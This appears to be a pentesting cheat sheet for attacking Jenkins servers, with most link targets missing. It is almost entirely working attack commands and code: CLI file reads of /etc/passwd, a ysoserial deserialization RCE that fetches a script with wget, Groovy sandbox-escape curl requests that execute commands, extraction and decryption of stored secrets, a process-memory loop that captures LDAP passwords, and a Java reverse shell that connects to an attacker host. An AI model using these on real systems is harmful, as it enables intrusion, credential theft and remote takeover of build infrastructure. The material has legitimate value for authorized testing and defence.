Authenticated, can retrieve a complete file:
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins -auth abc:abc connect-node "@/etc/passwd"
Unauthenticated or missing Global/Read permissions, can only read 3 lines: Read first line:
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins who-am-i "@/etc/passwd"
Read second line:
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins enable-job "@/etc/passwd"
Read third line:
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins keep-build "@/etc/passwd"
How to bruteforce the credential encryption key.
Use ysoserial to generate a payload. Then RCE using this script:
java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
./jenkins_rce.py jenkins_ip jenkins_port payload.out
Details here.
If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
Original RCE vulnerability here, full exploit here.
Alternative RCE with Overall/Read and Job/Configure permissions here.
Check if a Jenkins instance is vulnerable (needs Overall/Read permissions) with some Groovy:
curl -k -4 -X POST "https://example.com/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/" -d "sandbox=True" -d 'value=class abcd{abcd(){sleep(5000)}}'
Note: If you get a 403 error complaining about a missing crumb (which is a CSRF protection in Jenkins), you may be able to get the crumb value with a GET request to https://example.com/crumbIssuer/api/json
. The crumb value shall then be added to the POST request in a Jenkins-Crumb
Header.
Execute arbitraty bash commands:
curl -k -4 -X POST "https://example.com/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/" -d "sandbox=True" -d 'value=class abcd{abcd(){"wget xx.xx.xx.xx/bla.txt".execute()}}'
If you don't immediately get a reverse shell you can debug by throwing an exception:
curl -k -4 -X POST "https://example.com/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/" -d "sandbox=True" -d 'value=class abcd{abcd(){def proc="id".execute();def os=new StringBuffer();proc.waitForProcessOutput(os, System.err);throw new Exception(os.toString())}}'
This one will only work is a user has the 'Jobs/Configure' rights in the security matrix so it's very specific.
Note that this is only exploitable if using a dedicated and out-of-date Update Center. Therefore most servers are not vulnerable.
Use this script to dump build console outputs and build environment variables to hopefully find cleartext secrets.
usage: jenkins_dump_builds.py [-h] [-u USER] [-p PASSWORD] [-o OUTPUT_DIR]
[-l] [-r] [-d] [-s] [-v]
url [url ...]
Dump all available info from Jenkins
positional arguments:
url
optional arguments:
-h, --help show this help message and exit
-u USER, --user USER
-p PASSWORD, --password PASSWORD
-o OUTPUT_DIR, --output-dir OUTPUT_DIR
-l, --last Dump only the last build of each job
-r, --recover_from_failure
Recover from server failure, skip all existing
directories
-d, --downgrade_ssl Downgrade SSL to use RSA (for legacy)
-s, --no_use_session Don't reuse the HTTP session, but create a new one for
each request (for legacy)
-v, --verbose Debug mode
Use this python script or this powershell script.
These files are needed to decrypt Jenkins secrets:
- secrets/master.key
- secrets/hudson.util.Secret
Such secrets can usually be found in:
- credentials.xml
- jobs/.../build.xml
Here's a regexp to find them:
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
If Jenkins is configured to verify user credentials by relaying them to a LDAP (which is retarded, but a common vulnerability in companies) it's possible to recover these cleartext user credentials by dumping the Java process' memory. Assuming PID 7 for the Jenkins server the following loop will perform a memory dump of the stack every 30 seconds:
head -n 1 /proc/7/maps
a=<first hex number>
b=<second hex number>
while [ 1 ]; do dd if=/proc/7/mem bs=$(getconf PAGESIZE) iflag=skip_bytes,count_bytes skip=$((0x$a)) count=$((0x$b - 0x$a)) of=/tmp/tmp.bin; strings /tmp/tmp.bin | grep "uid=" && break; sleep 30; done
A small delay is important because the garbage collector will regularly free the credential structures.
Use this script to decrypt previsously dumped secrets.
Usage:
jenkins_offline_decrypt.py <jenkins_base_path>
or:
jenkins_offline_decrypt.py <master.key> <hudson.util.Secret> [credentials.xml]
or:
jenkins_offline_decrypt.py -i <path> (interactive mode)
println(hudson.util.Secret.decrypt("{...}"))
def proc = "id".execute();
def os = new StringBuffer();
proc.waitForProcessOutput(os, System.err);
println(os.toString());
Multiline shell command that can include pipes, redirects and stuff:
def proc = ['bash', '-c', '''your_long_command_here'''].execute();
Automate it using this script.
By default execution happens on the master node. Use this script to execute on a specific slave:
import hudson.util.RemotingDiagnostics
import jenkins.model.Jenkins
String agent_name = 'slave_name'
groovy_script = '''
def proc = ['cmd', '/c', 'cd D:\\\\ && dir data'].execute();
def os = new StringBuffer();
proc.waitForProcessOutput(os, System.err);
println(os.toString());
'''
String result
Jenkins.instance.slaves.find { agent ->
agent.name == agent_name
}.with { agent ->
result = RemotingDiagnostics.executeGroovy(groovy_script, agent.channel)
}
println result
String host="myip";
int port=1234;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
I'll leave this reverse shell tip to recover a fully working PTY here in case anyone needs it:
python -c 'import pty; pty.spawn("/bin/bash")'
^Z bg
stty -a
echo $TERM
stty raw -echo
fg
export TERM=...
stty rows xx columns yy